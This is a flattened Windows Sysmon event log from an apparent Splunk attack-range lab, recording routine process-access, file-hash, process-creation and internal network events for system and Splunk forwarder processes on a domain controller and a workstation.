11:07:45.345{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000295672Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:46.615{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27A0CB7869556E5679FD352017D4CF3B,SHA256=A7FE562B7BF3B214605369DFA41C359E551F14B7C35B7B2165AE338F05688F8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219785Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:46.380{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219784Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:46.161{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4D0188875D0BFB84E1DAC6B51E9871E,SHA256=0CEE6B9010319C965D9649989C43D8D22A8DB9EC64AE195FB40702172C2D3E6A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219783Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:43.704{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51540-false10.0.1.12-8000- 23542300x8000000000000000295671Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:46.500{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6F188FF768C4301151F1287694D6DCA5,SHA256=0D0CB410235E8FA838EAF5AA07C5D1097C51F6777BF358F262CD509EA024DD2C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295670Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:46.484{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C87A18A3C1B0400FD28AD54FAB36B832,SHA256=943622B93B47D3A4157D302261166FADEA05FF256B7D28ED0F51EB94D2491893,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295684Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:47.667{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA1FF0CAFA3EFFB617EF7DEE9BD202E7,SHA256=26DCE47F7524AAB66FC5EEFC919966AFE15CC8C17BC9A449E05BF0E8D5C40B4E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000219815Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:47.973{4F8D34B0-1583-6216-D304-000000003902}1068964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000219814Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:47.942{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7327FEE1F7D087C383061CE9AF7F52EC,SHA256=EDB351CC4E5C87941C005970ED3DAE2D4BB5A0D377B63EDEAF9F21B81B6D053F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000219813Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:47.739{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1583-6216-D304-000000003902}1068C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219812Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:47.739{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219811Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:47.739{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219810Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:47.739{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219809Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:47.739{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219808Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:47.739{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219807Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:47.739{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219806Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:47.739{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219805Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:47.739{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219804Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:47.739{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219803Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:47.739{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1583-6216-D304-000000003902}1068C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000219802Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:47.739{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1583-6216-D304-000000003902}1068C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000219801Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:47.740{4F8D34B0-1583-6216-D304-000000003902}1068C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000219800Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:47.239{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1583-6216-D204-000000003902}432C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219799Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:47.239{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219798Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:47.239{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219797Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:47.239{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219796Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:47.239{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219795Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:47.239{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219794Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:47.239{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219793Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 